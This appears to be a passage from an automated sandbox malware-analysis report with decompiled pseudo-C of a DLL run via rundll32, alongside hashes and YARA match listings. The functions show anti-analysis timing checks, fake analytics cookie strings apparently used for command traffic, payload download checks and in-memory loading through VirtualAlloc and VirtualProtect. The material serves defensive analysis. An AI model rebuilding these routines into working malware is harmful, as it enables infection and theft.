				E000007FE7FEF74DA588(1, _t140, _t155, _t156, _t162, _t163, _t164, _t166, _t168);
				if (__edi == __edi) goto 0xf74d381a;
				_t161 = _a56 + _t130;
				if (__ebx == __ebx) goto 0xf74d3828;
				if (__esp == __esp) goto 0xf74d380e;
				if (__esp == __esp) goto 0xf74d3834; // executed
				RtlAllocateHeap(??, ??, ??);
				if (__edi == __edi) goto 0xf74d3854;
				_t132 = _a136;
				_t76 =  *((intOrPtr*)(_t132 + 8));
				if (__ebx == __ebx) goto 0xf74d37ff;
				 *_a136 = _t132;
				_t133 = _a136;
				r8d = r8d + 0xf;
				if (0 == 0) goto 0xf74d386e;
				_t152 = _a136;
				_t77 = E000007FE7FEF74D8E8D(_t76, _t140, _t152, _t155, _t156, _t157, _t158, _t161, _t162, _t164, _t165, _t166, _t167, _t168);
				if (0 == 0) goto 0xf74d38b6;
				_a36 = _a36 + 0x24;
				_a37 = 5;
				goto 0xf74d3898;
				_a37 = _a37 + 0x73;
				r8d = 0;
				goto 0xf74d374d;
				_a56 = _t133;
				_a36 = 0xc;
				if (_t77 == _t77) goto 0xf74d388c;
				_t78 = _t77 / _t152;
				if (_t78 == _t78) goto 0xf74d3880;
				_a72 = _a40;
				goto 0xf74d391b;
				_t159 = _t159 - 0x78;
				goto 0xf74d3b2c;
				_v104 = _t155;
				_v112 = _t152;
				if (__esi == __esi) goto 0xf74d38d3;
				_t152 =  *_a8;
				E000007FE7FEF74D90C0( *((intOrPtr*)(_a40 + 8)), _a8, _t140,  *_a8, _t155, _t156, _t157, _t162, _t163, _t164, _t165, _t167, _t168);
				goto 0xf74d3b3f;
				goto 0xf74d38a8;
				if ( *_a8 == 0) goto 0xf74d3900;
				_t78 = 0;
				goto 0xf74d3900;
				_v80 = _v48;
				goto L8;
				_v87 = __al;
				goto 0xf74d3b1e;
				__rcx = _a16;
				__eax = E000007FE7FEF74D8E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
				if (__ah == __ah) goto 0xf74d399d;
				_v88 = __al;
				__rax = _v72;
				if (__dx == __dx) goto 0xf74d3990;
				r8d = r8d + 0xf;
				__edx = 0;
				if (__dl == __dl) goto 0xf74d3934;
				__rax = __rcx;
				__al =  *__rax;
				if (__bx == __bx) goto 0xf74d3945;
				__rcx = _a16;
				__r8 =  *__rcx;
				__eax = E000007FE7FEF74D3B56(__ecx, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
				goto 0xf74d3b0f;
				__rax = __rcx;
				__al =  *((intOrPtr*)(__rax + 1));
				if (__di == __di) goto 0xf74d3927;
				_v64 = _v64 + __rax;
				if (__ax == __ax) goto 0xf74d3985;
				__eax = E000007FE7FEF74DA588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
				__rax =  *((intOrPtr*)(__rax + 0x60));
				goto 0xf74d3967;
				if (__eax != 0) goto 0xf74d39b9;
				if (_v80 - 2 < 0) goto 0xf74d39b9;
				goto E000007FE7FEF74D36FA;
				_v80 = _v80 >> 1;
				goto 0xf74d373d;
				__rsp = __rsp + 0x78;
				return __eax;
			}













































                                                  0x7fef74d36fa
                                                  0x7fef74d36ff
                                                  0x7fef74d3706
                                                  0x7fef74d3708
                                                  0x7fef74d370d
                                                  0x7fef74d3712
                                                  0x7fef74d371f
                                                  0x7fef74d3721
                                                  0x7fef74d3726
                                                  0x7fef74d372d
                                                  0x7fef74d372f
                                                  0x7fef74d3734
                                                  0x7fef74d373b
                                                  0x7fef74d3745
                                                  0x7fef74d374b
                                                  0x7fef74d374d
                                                  0x7fef74d3759
                                                  0x7fef74d3765
                                                  0x7fef74d3767
                                                  0x7fef74d376c
                                                  0x7fef74d3776
                                                  0x7fef74d3786
                                                  0x7fef74d378a
                                                  0x7fef74d3791
                                                  0x7fef74d3793
                                                  0x7fef74d379c
                                                  0x7fef74d37a1
                                                  0x7fef74d37b3
                                                  0x7fef74d37b5
                                                  0x7fef74d37b8
                                                  0x7fef74d37be
                                                  0x7fef74d37c8
                                                  0x7fef74d37ca
                                                  0x7fef74d37cd
                                                  0x7fef74d37d5
                                                  0x7fef74d37df
                                                  0x7fef74d37e9
                                                  0x7fef74d37eb
                                                  0x7fef74d37f0
                                                  0x7fef74d37fa
                                                  0x7fef74d37ff
                                                  0x7fef74d3804
                                                  0x7fef74d380c
                                                  0x7fef74d380e
                                                  0x7fef74d3818
                                                  0x7fef74d3826
                                                  0x7fef74d3832
                                                  0x7fef74d3834
                                                  0x7fef74d3843
                                                  0x7fef74d3845
                                                  0x7fef74d384d
                                                  0x7fef74d3852
                                                  0x7fef74d3854
                                                  0x7fef74d3857
                                                  0x7fef74d3864
                                                  0x7fef74d386c
                                                  0x7fef74d386e
                                                  0x7fef74d3876
                                                  0x7fef74d388a
                                                  0x7fef74d388c
                                                  0x7fef74d3891
                                                  0x7fef74d3896
                                                  0x7fef74d3898
                                                  0x7fef74d389d
                                                  0x7fef74d38a3
                                                  0x7fef74d38a8
                                                  0x7fef74d38ad
                                                  0x7fef74d38b4
                                                  0x7fef74d38b6
                                                  0x7fef74d38c7
                                                  0x7fef74d38cc
                                                  0x7fef74d38d1
                                                  0x7fef74d38d3
                                                  0x7fef74d38df
                                                  0x7fef74d38e4
                                                  0x7fef74d38e9
                                                  0x7fef74d38f1
                                                  0x7fef74d38f3
                                                  0x7fef74d38f6
                                                  0x7fef74d38fb
                                                  0x7fef74d390b
                                                  0x7fef74d3910
                                                  0x7fef74d3912
                                                  0x7fef74d3919
                                                  0x7fef74d3920
                                                  0x7fef74d3925
                                                  0x7fef74d3927
                                                  0x7fef74d392f
                                                  0x7fef74d3934
                                                  0x7fef74d393c
                                                  0x7fef74d3943
                                                  0x7fef74d3945
                                                  0x7fef74d3949
                                                  0x7fef74d3951
                                                  0x7fef74d3953
                                                  0x7fef74d3957
                                                  0x7fef74d395b
                                                  0x7fef74d395d
                                                  0x7fef74d3960
                                                  0x7fef74d3965
                                                  0x7fef74d3967
                                                  0x7fef74d396f
                                                  0x7fef74d397b
                                                  0x7fef74d3980
                                                  0x7fef74d3985
                                                  0x7fef74d3988
                                                  0x7fef74d398e
                                                  0x7fef74d3995
                                                  0x7fef74d399b
                                                  0x7fef74d399d
                                                  0x7fef74d39a2
                                                  0x7fef74d39a6
                                                  0x7fef74d39aa
                                                  0x7fef74d39b2
                                                  0x7fef74d39b4
                                                  0x7fef74d39be
                                                  0x7fef74d39c1
                                                  0x7fef74d39c6
                                                  0x7fef74d39ca

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
                                                  • Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                                  • Instruction ID: 966cfb07d4891169f33f0eb5065ec30f3ff55f21518483f00f2b13c4e6352a57
                                                  • Opcode Fuzzy Hash: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                                  • Instruction Fuzzy Hash: AB313E66A2DA86C1EAF09E55E45437BE6D1E385B84F944039F5CE47BA4CA3CE8848700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000000018000244C Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                                  • Instruction ID: 91c5236132e037b4dad52b7741e0f6a58db73a54ac04ee9c9214898af67bde3f
                                                  • Opcode Fuzzy Hash: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                                  • Instruction Fuzzy Hash: 38D05E72A1024483E775D720A5063A93321A398359F80C205E64908954CF7DC25CC705
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0000000180002AC0 Relevance: 3.0, APIs: 2, Instructions: 47threadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E00000001180002AC0(intOrPtr __ebx, intOrPtr __edx, void* __eflags, signed int __rax, long long __rbx, signed int __rdx, long long __rsi) {
				signed int _t18;
				signed long long _t42;
				long long _t52;
				void* _t55;
				void* _t56;

				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = _t52;
				 *((long long*)(_t55 + 0x18)) = __rsi;
				_t56 = _t55 - 0x30;
				SwitchToThread();
				asm("rdtsc");
				_t42 = __rdx << 0x20;
				asm("cpuid");
				 *((intOrPtr*)(_t56 + 0x20)) = 1;
				 *((intOrPtr*)(_t56 + 0x24)) = __ebx;
				 *((intOrPtr*)(_t56 + 0x28)) = 0;
				 *((intOrPtr*)(_t56 + 0x2c)) = __edx;
				asm("rdtsc");
				_t43 = _t42 << 0x20;
				_t18 = SwitchToThread();
				asm("rdtsc");
				asm("rdtsc");
				if (__eflags != 0) goto 0x80002adb;
				return _t18 / (__rsi + ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020 | _t43 << 0x00000020 << 0x00000020) - ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020));
			}








                                                  0x180002ac0
                                                  0x180002ac5
                                                  0x180002aca
                                                  0x180002ad0
                                                  0x180002adb
                                                  0x180002ae1
                                                  0x180002ae3
                                                  0x180002af4
                                                  0x180002af6
                                                  0x180002afa
                                                  0x180002afe
                                                  0x180002b02
                                                  0x180002b06
                                                  0x180002b08
                                                  0x180002b15
                                                  0x180002b1b
                                                  0x180002b28
                                                  0x180002b3b
                                                  0x180002b59

                                                  APIs
                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002ADB
                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002B15
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                                  • Instruction ID: 31e80d72c3d44f8f19491c3afcfcc8ffca94b91b5460d3bc01de11eb56bf2daf
                                                  • Opcode Fuzzy Hash: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                                  • Instruction Fuzzy Hash: 93019EB2B24A948BDF64CB26B600389B6A2E38C7C0F14C535EB9D43B18DA3CD5958B04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001904 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 74libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$AddressLibraryLoadProc
                                                  • String ID: %s%u$; _gat=$NTDLL.DLL$RtlGetVersion
                                                  • API String ID: 1873754389-181482773
                                                  • Opcode ID: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                                  • Instruction ID: b0e16dee8d78cd610c3fce9f61b73237315bc0fd6264dbce3c4a8d294556f37b
                                                  • Opcode Fuzzy Hash: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                                  • Instruction Fuzzy Hash: A1311872B00A4991EA62DB11F854BE97360FB9CBC5F848126EA0D67B65DF3CC61EC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001F2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrcat$FolderPath
                                                  • String ID: c:\ProgramData\
                                                  • API String ID: 2440492483-4167965204
                                                  • Opcode ID: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                                  • Instruction ID: 13a3a00d3bf98ac6014c4b177c238986472ee82a99ac8020d1391539c79a1c4f
                                                  • Opcode Fuzzy Hash: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                                  • Instruction Fuzzy Hash: A8213472204B84C6EB52DF21E8043EAB765F758BC4F888021EE990BB69CF78C25DC714
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001688 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CreateDirectoryFolderPathlstrcpy
                                                  • String ID: c:\ProgramData\
                                                  • API String ID: 1583731639-4167965204
                                                  • Opcode ID: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                                  • Instruction ID: 6a04e3bab3544b7625e32e0bbe63c8079b4262e858a91f78b1d04aa0cec903dd
                                                  • Opcode Fuzzy Hash: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                                  • Instruction Fuzzy Hash: 4B211A72214A8A96EB51CF11E8447CE7364F788BC8F959022EA5E57668DF38C60ECB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00000001800027B4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E000000011800027B4(void* __rax, void* __rbx, void* __rcx, void* _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				void* __rdi;
				void* _t20;
				void* _t45;

				E00000001180002C88(_t20, __rbx,  &_v24, __rcx, _t45, __rbx);
				r9d = _v24;
				wsprintfW(??, ??);
				r9d = _v20;
				wsprintfW(??, ??);
				r9d = _v12;
				wsprintfW(??, ??);
				r9d = _v16;
				wsprintfW(??, ??);
				return __rax;
			}










                                                  0x1800027c6
                                                  0x1800027cb
                                                  0x1800027e1
                                                  0x1800027e7
                                                  0x180002801
                                                  0x180002807
                                                  0x180002824
                                                  0x18000282a
                                                  0x180002847
                                                  0x18000285c

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf
                                                  • String ID: %s%u$; _ga=
                                                  • API String ID: 2111968516-3272795577
                                                  • Opcode ID: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                                  • Instruction ID: 8dfdff9f2ba73ed5fda4775318dfd5996efea46270aa07bd7b9716fa6782b752
                                                  • Opcode Fuzzy Hash: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                                  • Instruction Fuzzy Hash: 80119672704A4A92DA62CF14F5547E97320FB5C789F848226EA4D27A76DE3CC62EC740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001D80 Relevance: 9.1, APIs: 6, Instructions: 62memorysleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 43%
                                                  			E00000001180001D80(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, intOrPtr* __r8, long long* __r9, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				char _v136;
				void* __rdi;
				void* _t12;
				char* _t37;
				intOrPtr* _t51;
				void* _t66;

				_t66 = __r11;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t51 = __r8;
				wsprintfW(??, ??);
				_t12 = E00000001180001B08( &_v136, __rdx, __r8, __r9);
				_t37 =  *_t51;
				if (_t12 == 0x194) goto 0x80001e2e;
				if (_t12 != 0xc8) goto 0x80001e01;
				if (_t37 == 0) goto 0x80001e1a;
				if ( *__r9 - 0x400 < 0) goto 0x80001e01;
				if ( *_t37 != 0x1f) goto 0x80001e01;
				if ( *((char*)(_t37 + 1)) != 0x8b) goto 0x80001e01;
				if (E00000001180001760(_t37, _t51, __r9, __r9, _t51, _t66, __r14) != 0) goto 0x80001e27;
				if (_t37 == 0) goto 0x80001e1a;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				Sleep(??);
				goto 0x80001db5;
				goto 0x80001e49;
				if (_t37 == 0) goto 0x80001e47;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				return 0;
			}










                                                  0x180001d80
                                                  0x180001d80
                                                  0x180001d85
                                                  0x180001d8a
                                                  0x180001d97
                                                  0x180001daf
                                                  0x180001dc3
                                                  0x180001dc8
                                                  0x180001dd0
                                                  0x180001dd7
                                                  0x180001ddc
                                                  0x180001de5
                                                  0x180001dea
                                                  0x180001df0
                                                  0x180001dff
                                                  0x180001e04
                                                  0x180001e06
                                                  0x180001e14
                                                  0x180001e1f
                                                  0x180001e25
                                                  0x180001e2c
                                                  0x180001e31
                                                  0x180001e33
                                                  0x180001e41
                                                  0x180001e61

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess$Sleepwsprintf
                                                  • String ID:
                                                  • API String ID: 2048420019-0
                                                  • Opcode ID: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                                  • Instruction ID: a2cd984f53a93593caa01796726c62d074961a460daaaee6897d674b1d8fdaee
                                                  • Opcode Fuzzy Hash: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                                  • Instruction Fuzzy Hash: 06213872604BC8CAFBA2DB22E4043D97295AB5DBC2F48C131EF495B795DF38C6498341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001B5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 33%
                                                  			E00000001180001B5C(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				void* _t13;
				void* _t29;

				_a8 = __rbx;
				_a16 = __rsi;
				_t13 = __edx;
				GetProcessHeap();
				r8d = 0x2001;
				HeapAlloc(??, ??, ??);
				if (__rax == 0) goto 0x80001bc2;
				E000000011800014B4(__rax, __rax, __rax, L"Cookie: _s=", __rcx, _t29, __rcx);
				r9d = _t13;
				return wsprintfW(??, ??);
			}





                                                  0x180001b5c
                                                  0x180001b61
                                                  0x180001b6b
                                                  0x180001b70
                                                  0x180001b7b
                                                  0x180001b84
                                                  0x180001b90
                                                  0x180001b9f
                                                  0x180001ba4
                                                  0x180001bd1

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFreewsprintf
                                                  • String ID: %s%u$Cookie: _s=
                                                  • API String ID: 4121094037-887366058
                                                  • Opcode ID: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                                  • Instruction ID: 843dd351c34123922bb2a738a6afe93933f5c472e56c7fab694ad2d1448e7ea3
                                                  • Opcode Fuzzy Hash: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                                  • Instruction Fuzzy Hash: 65F03772700B8981EA92CB0AF4443D93660F78CBC0F489124EE4E1B76ADE3CC64AC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180002B5C Relevance: 7.6, APIs: 5, Instructions: 87memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 29%
                                                  			E00000001180002B5C(signed int __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* _a8, long long _a16, long long _a24, long long _a32) {
				void* __rdi;
				signed int _t43;
				intOrPtr _t54;
				void* _t56;
				void* _t61;
				signed long long _t63;
				void* _t66;
				void* _t68;
				signed long long _t69;
				void* _t78;
				signed int _t80;
				intOrPtr* _t89;

				_t68 = __rcx;
				_t63 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t66 = __rcx;
				r8d = 0x3000;
				_t5 = _t68 + 4; // 0x4
				r9d = _t5;
				VirtualAlloc(??, ??, ??, ??);
				_t80 = __rax;
				if (__rax != 0) goto 0x80002baa;
				GetLastError();
				goto 0x80002c72;
				_t54 =  *((intOrPtr*)(__rcx + 0x1c));
				if (_t54 <= 0) goto 0x80002bf1;
				_t69 = __rax * 0x11;
				r8d =  *(_t69 + __rcx + 0x28);
				r10d =  *((intOrPtr*)(_t69 + __rcx + 0x20));
				_t89 = __r8 + __rcx;
				r9d =  *((intOrPtr*)(_t69 + __rcx + 0x2c));
				if (_t54 == 0) goto 0x80002bea;
				if (_t89 == 0) goto 0x80002bea;
				_t56 = __r9;
				if (_t56 == 0) goto 0x80002bea;
				 *((char*)(__r10 + __rax)) =  *_t89;
				if (_t56 != 0) goto 0x80002bd8;
				if (1 -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x80002bb1;
				if (E00000001180001A3C(1 -  *((intOrPtr*)(__rcx + 0x1c)), __rax, __rcx, __rax, __rcx, __rax) != 0) goto 0x80002c07;
				goto 0x80002c72;
				if (E00000001180001E64(__rcx, __rax, __rcx, _t78, __rax, __rdx) != 0) goto 0x80002c28;
				GetLastError();
				goto 0x80002c72;
				if ( *((intOrPtr*)(_t66 + 0x1c)) <= 0) goto 0x80002c56;
				r8d =  *(_t63 * 0x11 + _t66 + 0x30) & 0x000000ff;
				VirtualProtect(??, ??, ??, ??);
				_t61 = 1 -  *((intOrPtr*)(_t66 + 0x1c));
				if (_t61 < 0) goto 0x80002c2d;
				if (_t61 == 0) goto 0x80002c72;
				 *((long long*)(_t63 + _t80))();
				_t43 = GetLastError();
				asm("bts eax, 0x1b");
				return _t43 & 0x00ffffff;
			}















                                                  0x180002b5c
                                                  0x180002b5c
                                                  0x180002b5c
                                                  0x180002b61
                                                  0x180002b66
                                                  0x180002b73
                                                  0x180002b79
                                                  0x180002b81
                                                  0x180002b81
                                                  0x180002b85
                                                  0x180002b8d
                                                  0x180002b93
                                                  0x180002b95
                                                  0x180002ba5
                                                  0x180002bac
                                                  0x180002baf
                                                  0x180002bb3
                                                  0x180002bb7
                                                  0x180002bbc
                                                  0x180002bc1
                                                  0x180002bc4
                                                  0x180002bcc
                                                  0x180002bd1
                                                  0x180002bd3
                                                  0x180002bd6
                                                  0x180002bde
                                                  0x180002be8
                                                  0x180002bef
                                                  0x180002bfe
                                                  0x180002c05
                                                  0x180002c14
                                                  0x180002c16
                                                  0x180002c26
                                                  0x180002c2b
                                                  0x180002c38
                                                  0x180002c49
                                                  0x180002c51
                                                  0x180002c54
                                                  0x180002c5c
                                                  0x180002c61
                                                  0x180002c63
                                                  0x180002c6e
                                                  0x180002c86

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
